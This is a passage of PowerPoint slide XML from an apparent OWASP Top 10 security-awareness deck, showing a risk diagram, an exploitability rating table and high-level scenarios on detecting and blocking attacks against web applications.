              <a:t>Sensitive Data Exposure</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="29" name="Group 28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="304800" y="1014596"/>
            <a:ext cx="6380328" cy="585604"/>
            <a:chOff x="304800" y="1014596"/>
            <a:chExt cx="6380328" cy="585604"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="30" name="Group 29"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="304800" y="1014596"/>
              <a:ext cx="6380328" cy="585604"/>
              <a:chOff x="304800" y="997424"/>
              <a:chExt cx="6380328" cy="585604"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="50"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a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>       </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>    Security</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>          Weakness</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="51" name="Group 63"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="476250" y="997424"/>
                <a:ext cx="139700" cy="304800"/>
                <a:chOff x="96" y="1344"/>
                <a:chExt cx="288" cy="624"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="60" name="Oval 64"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="144" y="1344"/>
                  <a:ext cx="192" cy="192"/>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p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="61" name="Line 65"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="240" y="1536"/>
                  <a:ext cx="0" cy="240"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="62" name="Line 66"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm flipH="1">
                  <a:off x="96" y="1776"/>
                  <a:ext cx="144" cy="192"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="63" name="Line 67"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="240" y="1776"/>
                  <a:ext cx="144" cy="192"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="64" name="Line 68"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="96" y="1632"/>
                  <a:ext cx="288" cy="0"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="52"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smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>    Attack</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>   Vectors</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="53" name="AutoShape 85"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4800600" y="1049628"/>
                <a:ext cx="685800" cy="428655"/>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00" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t> Technical</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>   Impacts</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="54" name="AutoShape 108"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="762000" y="1262418"/>
                <a:ext cx="534537" cy="123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55" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="2188570" y="1262418"/>
                <a:ext cx="630830" cy="1233"/>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56" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="50" idx="3"/>
                <a:endCxn id="53" idx="2"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="3899848" y="1263956"/>
                <a:ext cx="900752" cy="421"/>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57" name="Rectangle 89"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="304800" y="1280701"/>
                <a:ext cx="516488" cy="302327"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" algn="ctr">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPts val="800"/>
                  </a:lnSpc>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Threat</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Agents</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="58" name="AutoShape 142"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5923128" y="1073877"/>
                <a:ext cx="762000" cy="381000"/>
              </a:xfrm>
              <a:prstGeom prst="foldedCorner">
                <a:avLst>
                  <a:gd name="adj" fmla="val 125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t"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Business</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Impacts</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="59" name="AutoShape 149"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="53" idx="4"/>
                <a:endCxn id="58" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5486400" y="1263956"/>
                <a:ext cx="436728" cy="421"/>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1" name="AutoShape 117"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2879480" y="1091049"/>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p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="Rectangle 31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2861647" y="1235639"/>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3" name="Text Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1295400" cy="830997"/>
          </a:xfrm>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dirty="0" smtClean="0"/>
              <a:t>A6</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </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 name="Table 104"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="220132676"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="948520"/>
          <a:ext cx="6858000" cy="2539317"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
              </a:tblGrid>
              <a:tr h="645302">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r>
              <a:tr h="40557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rPr>
                        <a:t>Application</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Specific</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="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1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Exploitability</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>EASY</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baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Prevalence</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>COMMON</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Detectability</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>AVERAGE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Im</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>pact</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MODERATE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Application / Business</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Specific</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479783">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Consider</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> a</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>nyone with network access can send your application a request. Does your</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> application detect and respond to both manual and automated attacks?</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="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ts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Attackers,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> known users or anonymous, send in attacks. Does the application or API detect the attack? How does it respond? Can it thwart attacks against known vulnerabilities? </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="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nSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="200"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Applications and APIs are attacked all the time. Most applications and APIs detect invalid input, but simply reject it, letting the attacker attack again and again. Such attacks indicate a malicious or compromised user probing or exploiting vulnerabilities. Detecting and blocking both manual and automated attacks, is one of the most effective ways to increase security. How quickly can you patch a critical vulnerability you just discovered?</a:t>
                      </a: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p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Most </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>successful attacks start with vulnerability probing. Allowing such probes to continue can raise the likelihood of successful exploit to 100%. Not quickly deploying patches aids attackers.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="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ts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Consider the impact of insufficient attack protection on the business. Successful attacks may not be prevented, go undiscovered for long periods of time, and expand far beyond their initial footprint.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="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07" name="Rectangle 106"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6400800"/>
            <a:ext cx="3383280" cy="2743200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:no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Example Attack Scenarios</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scenario #1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Attacker uses automated tool like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>OWASP ZAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>SQLMap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to detect vulnerabilities and possibly exploit them.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attack detection should recognize the application is being targeted with unusual requests and high volume. Automated scans should be easy to distinguish from normal traffic.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scenario #2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: A skilled human attacker carefully probes for potential vulnerabilities, eventually finding an obscure flaw.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>While more difficult to detect, this attack still involves requests that a normal user would never send, such as input not allowed by the UI. Tracking this attacker may require building a case over time that demonstrates malicious intent.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scenario #3:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Attacker starts exploiting a vulnerability in your application that your current attack protection fails to block.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
